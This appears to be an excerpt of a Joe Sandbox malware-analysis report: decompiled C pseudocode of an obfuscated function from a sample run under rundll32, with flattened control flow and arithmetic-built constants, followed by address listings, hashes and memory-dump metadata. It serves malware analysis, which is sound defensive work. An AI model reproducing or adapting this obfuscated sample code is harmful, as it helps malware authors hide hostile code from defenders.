                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				unsigned int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t526;
                                                                                                                      				signed int _t531;
                                                                                                                      				void* _t540;
                                                                                                                      				intOrPtr _t544;
                                                                                                                      				intOrPtr _t546;
                                                                                                                      				signed int _t550;
                                                                                                                      				intOrPtr _t551;
                                                                                                                      				signed int _t552;
                                                                                                                      				signed int _t553;
                                                                                                                      				signed int _t554;
                                                                                                                      				signed int _t555;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int _t557;
                                                                                                                      				signed int _t558;
                                                                                                                      				signed int _t559;
                                                                                                                      				signed int _t560;
                                                                                                                      				signed int _t561;
                                                                                                                      				signed int _t562;
                                                                                                                      				signed int _t563;
                                                                                                                      				signed int _t564;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t566;
                                                                                                                      				signed int _t567;
                                                                                                                      				void* _t568;
                                                                                                                      				void* _t625;
                                                                                                                      				signed int _t627;
                                                                                                                      				signed int* _t631;
                                                                                                                      
                                                                                                                      				_t631 =  &_v1760;
                                                                                                                      				_v1616 = 0xeae527;
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_t553 = 0x26;
                                                                                                                      				_v1616 = _v1616 / _t553;
                                                                                                                      				_v1616 = _v1616 ^ 0x00062e5a;
                                                                                                                      				_t625 = 0x971d92c;
                                                                                                                      				_v1596 = 0x6602e1;
                                                                                                                      				_t554 = 0x25;
                                                                                                                      				_v1596 = _v1596 / _t554;
                                                                                                                      				_v1596 = _v1596 ^ 0x8002c1cf;
                                                                                                                      				_v1644 = 0xf63434;
                                                                                                                      				_t555 = 0x47;
                                                                                                                      				_v1644 = _v1644 / _t555;
                                                                                                                      				_v1644 = _v1644 + 0xf19c;
                                                                                                                      				_v1644 = _v1644 ^ 0x00046956;
                                                                                                                      				_v1716 = 0x50524a;
                                                                                                                      				_t32 =  &_v1716; // 0x50524a
                                                                                                                      				_t556 = 0x5f;
                                                                                                                      				_v1716 =  *_t32 / _t556;
                                                                                                                      				_v1716 = _v1716 + 0xeb9a;
                                                                                                                      				_v1716 = _v1716 >> 0x10;
                                                                                                                      				_v1696 = 0xd12665;
                                                                                                                      				_v1696 = _v1696 + 0xba99;
                                                                                                                      				_v1696 = _v1696 >> 2;
                                                                                                                      				_v1696 = _v1696 ^ 0x003ae3d7;
                                                                                                                      				_v1572 = 0xb7077f;
                                                                                                                      				_v1572 = _v1572 >> 0xb;
                                                                                                                      				_v1572 = _v1572 ^ 0x00005559;
                                                                                                                      				_v1732 = 0xacadbb;
                                                                                                                      				_v1732 = _v1732 * 0x18;
                                                                                                                      				_v1732 = _v1732 + 0xffff3f00;
                                                                                                                      				_v1732 = _v1732 >> 0xb;
                                                                                                                      				_v1732 = _v1732 ^ 0x0000fc07;
                                                                                                                      				_v1628 = 0x1e838c;
                                                                                                                      				_v1628 = _v1628 + 0xffff51c5;
                                                                                                                      				_v1628 = _v1628 * 0x68;
                                                                                                                      				_v1628 = _v1628 ^ 0x0c18a6b3;
                                                                                                                      				_v1712 = 0x7a729f;
                                                                                                                      				_v1712 = _v1712 | 0x553aa77e;
                                                                                                                      				_v1712 = _v1712 ^ 0x421b02cb;
                                                                                                                      				_v1712 = _v1712 * 0x57;
                                                                                                                      				_v1712 = _v1712 ^ 0xf24da14c;
                                                                                                                      				_v1620 = 0x85e70f;
                                                                                                                      				_v1620 = _v1620 >> 0xb;
                                                                                                                      				_v1620 = _v1620 ^ 0x000e59ba;
                                                                                                                      				_v1752 = 0xad6578;
                                                                                                                      				_v1752 = _v1752 * 0x5a;
                                                                                                                      				_v1752 = _v1752 << 0xc;
                                                                                                                      				_v1752 = _v1752 << 0x10;
                                                                                                                      				_v1752 = _v1752 ^ 0x00023595;
                                                                                                                      				_v1728 = 0x3989b2;
                                                                                                                      				_v1728 = _v1728 * 0x27;
                                                                                                                      				_v1728 = _v1728 * 0x4d;
                                                                                                                      				_v1728 = _v1728 << 4;
                                                                                                                      				_v1728 = _v1728 ^ 0x2f238c3a;
                                                                                                                      				_v1744 = 0x50e625;
                                                                                                                      				_v1744 = _v1744 ^ 0x2e9ac150;
                                                                                                                      				_v1744 = _v1744 >> 2;
                                                                                                                      				_v1744 = _v1744 >> 5;
                                                                                                                      				_v1744 = _v1744 ^ 0x00596b64;
                                                                                                                      				_v1684 = 0x3fc833;
                                                                                                                      				_t557 = 0x76;
                                                                                                                      				_v1684 = _v1684 / _t557;
                                                                                                                      				_v1684 = _v1684 ^ 0xe050a76e;
                                                                                                                      				_v1684 = _v1684 ^ 0xe05ba95d;
                                                                                                                      				_v1576 = 0x904481;
                                                                                                                      				_v1576 = _v1576 | 0xbb34e4d7;
                                                                                                                      				_v1576 = _v1576 ^ 0xbbb7ee3e;
                                                                                                                      				_v1612 = 0xe49eb3;
                                                                                                                      				_v1612 = _v1612 + 0xfa7c;
                                                                                                                      				_v1612 = _v1612 ^ 0x00e777f0;
                                                                                                                      				_v1624 = 0x2dc9df;
                                                                                                                      				_v1624 = _v1624 ^ 0xfde67a02;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_v1624 = _v1624 ^ 0x0fd7f95a;
                                                                                                                      				_v1688 = 0xb27c91;
                                                                                                                      				_v1688 = _v1688 + 0xcc48;
                                                                                                                      				_v1688 = _v1688 + 0xffff6aea;
                                                                                                                      				_v1688 = _v1688 ^ 0x00b739bb;
                                                                                                                      				_v1676 = 0x9962ec;
                                                                                                                      				_v1676 = _v1676 + 0xd2bc;
                                                                                                                      				_t627 = 0x59;
                                                                                                                      				_t558 = 0x22;
                                                                                                                      				_v1676 = _v1676 * 0x31;
                                                                                                                      				_v1676 = _v1676 ^ 0x1d838c0c;
                                                                                                                      				_v1720 = 0x20e7d3;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 / _t558;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 ^ 0x0002b2fc;
                                                                                                                      				_v1652 = 0xf809ca;
                                                                                                                      				_v1652 = _v1652 | 0xf7ee8eed;
                                                                                                                      				_v1652 = _v1652 << 1;
                                                                                                                      				_v1652 = _v1652 ^ 0xeff238d7;
                                                                                                                      				_v1580 = 0x7cb108;
                                                                                                                      				_v1580 = _v1580 + 0x41b4;
                                                                                                                      				_v1580 = _v1580 ^ 0x0076b4d3;
                                                                                                                      				_v1668 = 0xb3209d;
                                                                                                                      				_t559 = 0x53;
                                                                                                                      				_v1668 = _v1668 / _t559;
                                                                                                                      				_v1668 = _v1668 << 0xd;
                                                                                                                      				_v1668 = _v1668 ^ 0x450753ed;
                                                                                                                      				_v1604 = 0x53775b;
                                                                                                                      				_v1604 = _v1604 | 0x32a41867;
                                                                                                                      				_v1604 = _v1604 ^ 0x32fba052;
                                                                                                                      				_v1636 = 0xbc3265;
                                                                                                                      				_v1636 = _v1636 + 0xffff23eb;
                                                                                                                      				_v1636 = _v1636 ^ 0xe68a0726;
                                                                                                                      				_v1636 = _v1636 ^ 0xe63f3d4e;
                                                                                                                      				_v1756 = 0xe1916f;
                                                                                                                      				_v1756 = _v1756 + 0x6ec8;
                                                                                                                      				_v1756 = _v1756 | 0xf937d932;
                                                                                                                      				_v1756 = _v1756 + 0xfffffd3f;
                                                                                                                      				_v1756 = _v1756 ^ 0xf9f085ba;
                                                                                                                      				_v1588 = 0x69c4ca;
                                                                                                                      				_v1588 = _v1588 + 0xe8a1;
                                                                                                                      				_v1588 = _v1588 ^ 0x00630ca4;
                                                                                                                      				_v1584 = 0x6b201e;
                                                                                                                      				_v1584 = _v1584 | 0x74aee044;
                                                                                                                      				_v1584 = _v1584 ^ 0x74eba3bf;
                                                                                                                      				_v1760 = 0xf230ab;
                                                                                                                      				_v1760 = _v1760 >> 9;
                                                                                                                      				_v1760 = _v1760 >> 0xa;
                                                                                                                      				_v1760 = _v1760 >> 4;
                                                                                                                      				_v1760 = _v1760 ^ 0x00016a96;
                                                                                                                      				_v1704 = 0x98b305;
                                                                                                                      				_v1704 = _v1704 + 0x69fd;
                                                                                                                      				_v1704 = _v1704 ^ 0x979b8a6a;
                                                                                                                      				_v1704 = _v1704 + 0xffff998b;
                                                                                                                      				_v1704 = _v1704 ^ 0x9709d1d7;
                                                                                                                      				_v1736 = 0xce8702;
                                                                                                                      				_v1736 = _v1736 >> 0xa;
                                                                                                                      				_v1736 = _v1736 + 0x7a8b;
                                                                                                                      				_v1736 = _v1736 << 1;
                                                                                                                      				_v1736 = _v1736 ^ 0x000e6a30;
                                                                                                                      				_v1740 = 0x4c6a4b;
                                                                                                                      				_v1740 = _v1740 << 0xb;
                                                                                                                      				_v1740 = _v1740 | 0x0577b2ac;
                                                                                                                      				_v1740 = _v1740 + 0xffff4db5;
                                                                                                                      				_v1740 = _v1740 ^ 0x6775c844;
                                                                                                                      				_v1748 = 0x8b8c8;
                                                                                                                      				_t560 = 0x14;
                                                                                                                      				_v1748 = _v1748 / _t560;
                                                                                                                      				_t561 = 0x67;
                                                                                                                      				_v1748 = _v1748 / _t561;
                                                                                                                      				_t562 = 7;
                                                                                                                      				_v1748 = _v1748 * 0x36;
                                                                                                                      				_v1748 = _v1748 ^ 0x000fee79;
                                                                                                                      				_v1660 = 0xc3e5ac;
                                                                                                                      				_v1660 = _v1660 + 0xffffa1ff;
                                                                                                                      				_t563 = 0x46;
                                                                                                                      				_v1660 = _v1660 / _t562;
                                                                                                                      				_v1660 = _v1660 ^ 0x001e32d9;
                                                                                                                      				_v1664 = 0x1a636c;
                                                                                                                      				_v1664 = _v1664 | 0xf6dbfbcf;
                                                                                                                      				_v1664 = _v1664 ^ 0xf6df054d;
                                                                                                                      				_v1724 = 0xea18bc;
                                                                                                                      				_v1724 = _v1724 / _t563;
                                                                                                                      				_v1724 = _v1724 | 0x2d596700;
                                                                                                                      				_v1724 = _v1724 >> 1;
                                                                                                                      				_v1724 = _v1724 ^ 0x16a5f059;
                                                                                                                      				_v1672 = 0x567483;
                                                                                                                      				_v1672 = _v1672 >> 7;
                                                                                                                      				_v1672 = _v1672 + 0xffffe0a0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000eacf4;
                                                                                                                      				_v1680 = 0x757070;
                                                                                                                      				_v1680 = _v1680 >> 0xd;
                                                                                                                      				_v1680 = _v1680 ^ 0xeacc73ee;
                                                                                                                      				_v1680 = _v1680 ^ 0xeac5b183;
                                                                                                                      				_v1648 = 0x45ab81;
                                                                                                                      				_v1648 = _v1648 >> 6;
                                                                                                                      				_v1648 = _v1648 + 0xffff50ab;
                                                                                                                      				_v1648 = _v1648 ^ 0x000d5f86;
                                                                                                                      				_v1708 = 0x462580;
                                                                                                                      				_t564 = 0xb;
                                                                                                                      				_t550 = _v1568;
                                                                                                                      				_v1708 = _v1708 / _t564;
                                                                                                                      				_t565 = 0x75;
                                                                                                                      				_v1708 = _v1708 / _t565;
                                                                                                                      				_t566 = 0x37;
                                                                                                                      				_v1708 = _v1708 * 0x50;
                                                                                                                      				_v1708 = _v1708 ^ 0x00078e43;
                                                                                                                      				_v1592 = 0x6b02b0;
                                                                                                                      				_v1592 = _v1592 + 0xffff70eb;
                                                                                                                      				_v1592 = _v1592 ^ 0x006caa59;
                                                                                                                      				_v1600 = 0x2f56d1;
                                                                                                                      				_v1600 = _v1600 ^ 0x1dd1a998;
                                                                                                                      				_v1600 = _v1600 ^ 0x1df0badb;
                                                                                                                      				_v1656 = 0xa683af;
                                                                                                                      				_v1656 = _v1656 / _t566;
                                                                                                                      				_v1656 = _v1656 << 1;
                                                                                                                      				_v1656 = _v1656 ^ 0x0003d06f;
                                                                                                                      				_v1608 = 0x6ef6d9;
                                                                                                                      				_v1608 = _v1608 + 0xd0f0;
                                                                                                                      				_v1608 = _v1608 ^ 0x006391fa;
                                                                                                                      				_v1700 = 0x90b08b;
                                                                                                                      				_v1700 = _v1700 + 0x4c46;
                                                                                                                      				_v1700 = _v1700 | 0x5cc03ba9;
                                                                                                                      				_t567 = 0x12;
                                                                                                                      				_v1700 = _v1700 / _t567;
                                                                                                                      				_v1700 = _v1700 ^ 0x052b7d82;
                                                                                                                      				_v1692 = 0x3d9f33;
                                                                                                                      				_v1692 = _v1692 + 0xffff6a07;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1c8547f;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1f3c56b;
                                                                                                                      				_v1632 = 0x96979b;
                                                                                                                      				_v1632 = _v1632 / _t627;
                                                                                                                      				_v1632 = _v1632 >> 0xa;
                                                                                                                      				_v1632 = _v1632 ^ 0x0009a5bf;
                                                                                                                      				_v1640 = 0x6f31a2;
                                                                                                                      				_v1640 = _v1640 ^ 0x3a2ad5a2;
                                                                                                                      				_v1640 = _v1640 ^ 0xeb2d3a23;
                                                                                                                      				_v1640 = _v1640 ^ 0xd16332d1;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t568 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t526 = 0xdd30c3;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							if(_t625 == _t526) {
                                                                                                                      								_t531 = E0035C2CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0035BA68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
                                                                                                                      								_t631 =  &(_t631[0xd]);
                                                                                                                      								__eflags = _t531;
                                                                                                                      								_t625 = 0xd26443e;
                                                                                                                      								_t471 = _t531 == 0;
                                                                                                                      								__eflags = _t471;
                                                                                                                      								_v1568 = 0 | _t471;
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(_t625 == 0x971d92c) {
                                                                                                                      									_push(_t568);
                                                                                                                      									E0034EA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
                                                                                                                      									_t631 =  &(_t631[7]);
                                                                                                                      									_t625 = 0xf5a31c5;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									if(_t625 == 0x9b520f4) {
                                                                                                                      										_t551 =  *0x36520c; // 0x0
                                                                                                                      										_t552 = _t551 + 0x220;
                                                                                                                      										while(1) {
                                                                                                                      											__eflags =  *_t552 - _t568;
                                                                                                                      											if(__eflags == 0) {
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											_t552 = _t552 + 2;
                                                                                                                      											__eflags = _t552;
                                                                                                                      										}
                                                                                                                      										_t550 = _t552 + 2;
                                                                                                                      										_t625 = 0xaa323c9;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t625 == 0xaa323c9) {
                                                                                                                      											_push(_v1636);
                                                                                                                      											_push(_v1604);
                                                                                                                      											_t572 = _v1580;
                                                                                                                      											_push(0x34118c);
                                                                                                                      											__eflags = E00348786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E0034AB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
                                                                                                                      											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
                                                                                                                      											E0034AE03(_v1740, _v1748, _v1660, _t534);
                                                                                                                      											_t631 =  &(_t631[0x12]);
                                                                                                                      											L17:
                                                                                                                      											_t526 = 0xdd30c3;
                                                                                                                      											_t568 = 0x5c;
                                                                                                                      											goto L18;
                                                                                                                      										} else {
                                                                                                                      											if(_t625 == 0xd26443e) {
                                                                                                                      												E00347AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
                                                                                                                      											} else {
                                                                                                                      												_t640 = _t625 - 0xf5a31c5;
                                                                                                                      												if(_t625 != 0xf5a31c5) {
                                                                                                                      													goto L18;
                                                                                                                      												} else {
                                                                                                                      													_push(_v1728);
                                                                                                                      													_push(_v1752);
                                                                                                                      													_push(0x3410fc);
                                                                                                                      													_t540 = E0034AB66(_v1712, _v1620, _t640);
                                                                                                                      													E0035C66E( &_v1040, _t640);
                                                                                                                      													_t544 =  *0x36520c; // 0x0
                                                                                                                      													_t546 =  *0x36520c; // 0x0
                                                                                                                      													_t427 =  &_v1684; // 0xe63f3d4e
                                                                                                                      													E0035BDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
                                                                                                                      													E0034AE03(_v1676, _v1720, _v1652, _t540);
                                                                                                                      													_t631 =  &(_t631[0x10]);
                                                                                                                      													_t625 = 0x9b520f4;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t568 = 0x5c;
                                                                                                                      														L2:
                                                                                                                      														_t526 = 0xdd30c3;
                                                                                                                      														goto L3;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L21:
                                                                                                                      							return _v1568;
                                                                                                                      							L18:
                                                                                                                      							__eflags = _t625 - 0x546d466;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0035da7f
                                                                                                                      0x0035da8c
                                                                                                                      0x0035da90
                                                                                                                      0x0035da95
                                                                                                                      0x0035da9a
                                                                                                                      0x0035daa2
                                                                                                                      0x0035daaf
                                                                                                                      0x0035dab8
                                                                                                                      0x0035dabc
                                                                                                                      0x0035dac3
                                                                                                                      0x0035dacb
                                                                                                                      0x0035dad3
                                                                                                                      0x0035dadb
                                                                                                                      0x0035dae0
                                                                                                                      0x0035dae5
                                                                                                                      0x0035daed
                                                                                                                      0x0035dafb
                                                                                                                      0x0035db00
                                                                                                                      0x0035db04
                                                                                                                      0x0035db0c
                                                                                                                      0x0035db14
                                                                                                                      0x0035db1f
                                                                                                                      0x0035db2a
                                                                                                                      0x0035db35
                                                                                                                      0x0035db40
                                                                                                                      0x0035db4b
                                                                                                                      0x0035db56
                                                                                                                      0x0035db61
                                                                                                                      0x0035db6c
                                                                                                                      0x0035db74
                                                                                                                      0x0035db7f
                                                                                                                      0x0035db87
                                                                                                                      0x0035db8f
                                                                                                                      0x0035db97
                                                                                                                      0x0035db9f
                                                                                                                      0x0035dba7
                                                                                                                      0x0035dbb6
                                                                                                                      0x0035dbb9
                                                                                                                      0x0035dbba
                                                                                                                      0x0035dbbe
                                                                                                                      0x0035dbc6
                                                                                                                      0x0035dbd6
                                                                                                                      0x0035dbe2
                                                                                                                      0x0035dbee
                                                                                                                      0x0035dbf4
                                                                                                                      0x0035dbfc
                                                                                                                      0x0035dc07
                                                                                                                      0x0035dc12
                                                                                                                      0x0035dc19
                                                                                                                      0x0035dc24
                                                                                                                      0x0035dc2f
                                                                                                                      0x0035dc3a
                                                                                                                      0x0035dc45
                                                                                                                      0x0035dc51
                                                                                                                      0x0035dc54
                                                                                                                      0x0035dc58
                                                                                                                      0x0035dc5d
                                                                                                                      0x0035dc65
                                                                                                                      0x0035dc70
                                                                                                                      0x0035dc7b
                                                                                                                      0x0035dc86
                                                                                                                      0x0035dc91
                                                                                                                      0x0035dc9c
                                                                                                                      0x0035dca7
                                                                                                                      0x0035dcb2
                                                                                                                      0x0035dcba
                                                                                                                      0x0035dcc2
                                                                                                                      0x0035dcca
                                                                                                                      0x0035dcd2
                                                                                                                      0x0035dcda
                                                                                                                      0x0035dce7
                                                                                                                      0x0035dcf2
                                                                                                                      0x0035dcfd
                                                                                                                      0x0035dd08
                                                                                                                      0x0035dd13
                                                                                                                      0x0035dd1e
                                                                                                                      0x0035dd26
                                                                                                                      0x0035dd2b
                                                                                                                      0x0035dd30
                                                                                                                      0x0035dd35
                                                                                                                      0x0035dd3d
                                                                                                                      0x0035dd45
                                                                                                                      0x0035dd4d
                                                                                                                      0x0035dd55
                                                                                                                      0x0035dd5d
                                                                                                                      0x0035dd65
                                                                                                                      0x0035dd6d
                                                                                                                      0x0035dd72
                                                                                                                      0x0035dd7a
                                                                                                                      0x0035dd7e
                                                                                                                      0x0035dd86
                                                                                                                      0x0035dd8e
                                                                                                                      0x0035dd93
                                                                                                                      0x0035dd9b
                                                                                                                      0x0035dda3
                                                                                                                      0x0035ddab
                                                                                                                      0x0035ddb9
                                                                                                                      0x0035ddbe
                                                                                                                      0x0035ddc8
                                                                                                                      0x0035ddcd
                                                                                                                      0x0035ddd8
                                                                                                                      0x0035dddb
                                                                                                                      0x0035dddf
                                                                                                                      0x0035dde7
                                                                                                                      0x0035ddef
                                                                                                                      0x0035ddfd
                                                                                                                      0x0035ddfe
                                                                                                                      0x0035de04
                                                                                                                      0x0035de0c
                                                                                                                      0x0035de14
                                                                                                                      0x0035de1c
                                                                                                                      0x0035de24
                                                                                                                      0x0035de34
                                                                                                                      0x0035de38
                                                                                                                      0x0035de40
                                                                                                                      0x0035de44
                                                                                                                      0x0035de4c
                                                                                                                      0x0035de54
                                                                                                                      0x0035de59
                                                                                                                      0x0035de61
                                                                                                                      0x0035de69
                                                                                                                      0x0035de71
                                                                                                                      0x0035de76
                                                                                                                      0x0035de7e
                                                                                                                      0x0035de86
                                                                                                                      0x0035de91
                                                                                                                      0x0035de99
                                                                                                                      0x0035dea4
                                                                                                                      0x0035deb1
                                                                                                                      0x0035debd
                                                                                                                      0x0035dec2
                                                                                                                      0x0035dec9
                                                                                                                      0x0035ded8
                                                                                                                      0x0035dedd
                                                                                                                      0x0035dee8
                                                                                                                      0x0035deeb
                                                                                                                      0x0035deef
                                                                                                                      0x0035def7
                                                                                                                      0x0035df02
                                                                                                                      0x0035df0d
                                                                                                                      0x0035df18
                                                                                                                      0x0035df23
                                                                                                                      0x0035df2e
                                                                                                                      0x0035df39
                                                                                                                      0x0035df49
                                                                                                                      0x0035df4d
                                                                                                                      0x0035df51
                                                                                                                      0x0035df59
                                                                                                                      0x0035df64
                                                                                                                      0x0035df6f
                                                                                                                      0x0035df7a
                                                                                                                      0x0035df82
                                                                                                                      0x0035df8a
                                                                                                                      0x0035df96
                                                                                                                      0x0035df9b
                                                                                                                      0x0035df9f
                                                                                                                      0x0035dfa7
                                                                                                                      0x0035dfaf
                                                                                                                      0x0035dfb7
                                                                                                                      0x0035dfbf
                                                                                                                      0x0035dfc7
                                                                                                                      0x0035dfdb
                                                                                                                      0x0035dfe2
                                                                                                                      0x0035dfea
                                                                                                                      0x0035dff5
                                                                                                                      0x0035e000
                                                                                                                      0x0035e00b
                                                                                                                      0x0035e016
                                                                                                                      0x0035e021
                                                                                                                      0x0035e021
                                                                                                                      0x0035e023
                                                                                                                      0x0035e024
                                                                                                                      0x0035e024
                                                                                                                      0x0035e024
                                                                                                                      0x0035e029
                                                                                                                      0x0035e029
                                                                                                                      0x0035e02b
                                                                                                                      0x0035e25d
                                                                                                                      0x0035e264
                                                                                                                      0x0035e267
                                                                                                                      0x0035e269
                                                                                                                      0x0035e26e
                                                                                                                      0x0035e26e
                                                                                                                      0x0035e271
                                                                                                                      0x00000000
                                                                                                                      0x0035e031
                                                                                                                      0x0035e037
                                                                                                                      0x0035e1c5
                                                                                                                      0x0035e1eb
                                                                                                                      0x0035e1f0
                                                                                                                      0x0035e1f3
                                                                                                                      0x00000000
                                                                                                                      0x0035e03d
                                                                                                                      0x0035e043
                                                                                                                      0x0035e1a5
                                                                                                                      0x0035e1ab
                                                                                                                      0x0035e1b6
                                                                                                                      0x0035e1b6
                                                                                                                      0x0035e1b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1b3
                                                                                                                      0x0035e1bb
                                                                                                                      0x0035e1be
                                                                                                                      0x00000000
                                                                                                                      0x0035e049
                                                                                                                      0x0035e04b
                                                                                                                      0x0035e113
                                                                                                                      0x0035e11a
                                                                                                                      0x0035e125
                                                                                                                      0x0035e12c
                                                                                                                      0x0035e179
                                                                                                                      0x0035e195
                                                                                                                      0x0035e198
                                                                                                                      0x0035e19d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 179cd683cd981327faa06b0bf86d69e923bfbc10a4c3a55d52758d3be4db60cc
                                                                                                                      • Instruction ID: 279acca920b0d66c0a68525a0ddaa86640aab7949acdbc7629ebf3ee56e2e602
                                                                                                                      • Opcode Fuzzy Hash: 179cd683cd981327faa06b0bf86d69e923bfbc10a4c3a55d52758d3be4db60cc
                                                                                                                      • Instruction Fuzzy Hash: F332F272508380DFD369CF65C94AA8FBBE2FBC4718F10891DE19986260D7B59949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035EE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v4;
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				intOrPtr _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				intOrPtr _t445;
                                                                                                                      				void* _t448;
                                                                                                                      				intOrPtr _t453;
                                                                                                                      				signed int _t467;
                                                                                                                      				intOrPtr _t470;
                                                                                                                      				intOrPtr _t471;
                                                                                                                      				void* _t505;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				signed int _t515;
                                                                                                                      				signed int _t516;
                                                                                                                      				signed int _t517;
                                                                                                                      				signed int _t518;
                                                                                                                      				signed int _t519;
                                                                                                                      				signed int _t520;
                                                                                                                      				intOrPtr* _t521;
                                                                                                                      				signed int _t524;
                                                                                                                      				intOrPtr _t529;
                                                                                                                      				signed int* _t531;
                                                                                                                      				void* _t533;
                                                                                                                      
                                                                                                                      				_t471 = __ecx;
